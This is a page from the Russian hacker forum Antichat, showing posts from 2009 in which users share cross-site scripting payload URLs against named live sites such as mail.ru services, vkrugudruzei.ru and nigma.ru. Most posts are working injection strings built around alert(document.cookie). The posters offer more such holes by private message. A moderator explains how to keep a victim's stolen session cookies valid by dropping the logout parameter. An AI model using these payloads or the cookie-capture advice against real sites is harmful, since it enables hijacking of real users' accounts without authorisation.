ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #91  
Старый 07.11.2009, 16:25
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
Question

http://berserk.mail.ru/index.php?'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eid=239

http://berserk.mail.ru/berserk49.html?'%3E%3Cscript%3Ealert(/document.cookie/)%3C/script%3E
=))

Последний раз редактировалось Ruslan1817; 07.11.2009 в 16:42..
 
Ответить с цитированием

  #92  
Старый 08.11.2009, 12:04
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://soft.mail.ru/s_result_softclub.php?qs=1&words=%27%3E%3C%27%27%3 E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscrip t%3E

в фильтре есть дырка ... кто сможет реадизовать ?
 
Ответить с цитированием

  #93  
Старый 08.11.2009, 19:19
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://story.travel.mail.ru/?city_from=1&countryid=1934&countryidtxt=%C0%E1%F5 %E0%E7%E8%FF&cityid=1500&'%3E%3C''%3E%22%3E%3Cscri pt%3Ealert(/XSS/)%3C/script%3Ecityidtxt=%C3%E0%E3%F0%FB&hotelidtxt=%27% 3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F% 29%3C%2Fscript%3E&inp_mode=inp&price=%27%3E%3C%27% 27%3E%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fs cript%3E&p_mode=1&p_type=1&nights1=0&nights2=0&dat e1_d=1&date1_my=11_2009&date2_d=8&date2_my=12_2009 &comments=&mod=custom_order_tour



http://travel.mail.ru/?mod=companions&res=1&self_id=1&look_for_id=2&age_ from=&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28/Ruslan1817/%29%3C/script%3Eage_to=&account_region_id=0&geo_id=0&days _cnt_id=0&date1=08.11.2009&date2=08.12.2009

Последний раз редактировалось Ruslan1817; 08.11.2009 в 19:51..
 
Ответить с цитированием

  #94  
Старый 11.11.2009, 12:11
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

заходим сюды ---> http://travel.mail.ru/ слева вводим в поля " Город " , " Дата приезда - Дата отъезда " '><''>"><script>alert(document.cookie)</script> ---> найти отель !
WTF? печеькО )))
 
Ответить с цитированием

  #95  
Старый 11.11.2009, 20:15
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://content.mail.ru/cgi-bin/list.cgi в поле организация вставить '><''>"><script>alert(document.cookie)</script> и тут полетит печеняГа))
 
Ответить с цитированием

  #96  
Старый 20.11.2009, 01:24
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Все XSS тока для авторизированных!!! ( на майле 11 x 11 тока при получении письма )

http://vkrugudruzei.ru/user/advert/advert.asp?uid=7155524&%27%3E%3C%27%27%3E%22%3E%3C script%3Ealert%28document.cookie%29%3C/script%3E

http://11x11.mail.ru/xml/office/mail.php?id=18&type=office/mail&act=message&mode=1'%3E%3C''%3E%22%3E%3Cscript %3Ealert(/XSS/)%3C/script%3E

Кому надо еще XSS от вкругу друзей? стучим ногами в личку!


BlackSun -- тока умеешь -минусы ставить ? достал уже!

Последний раз редактировалось Ruslan1817; 20.11.2009 в 21:30..
 
Ответить с цитированием

  #97  
Старый 22.11.2009, 22:18
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Заходим сюда ---> http://travel.mail.ru ---> выбераем вклаку взять собой ( МТС ) ---> добавить ( ставим галку ) ----> <IMG SRC="javascript:alert( document.cookie );">
0_o ... WTF?
Как было тяжко без ачата
 
Ответить с цитированием

  #98  
Старый 23.11.2009, 09:48
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !
 
Ответить с цитированием

  #99  
Старый 23.11.2009, 10:17
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ruslan1817  
http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !

так гораздо лучше
http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>

запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....

Последний раз редактировалось satana-fu; 23.11.2009 в 10:21..
 
Ответить с цитированием

  #100  
Старый 26.11.2009, 16:38
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Не знал куда можно скинуть...

http://nigma.ru/index.php?s='><''>"><script>alert(document.cookie) </script>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ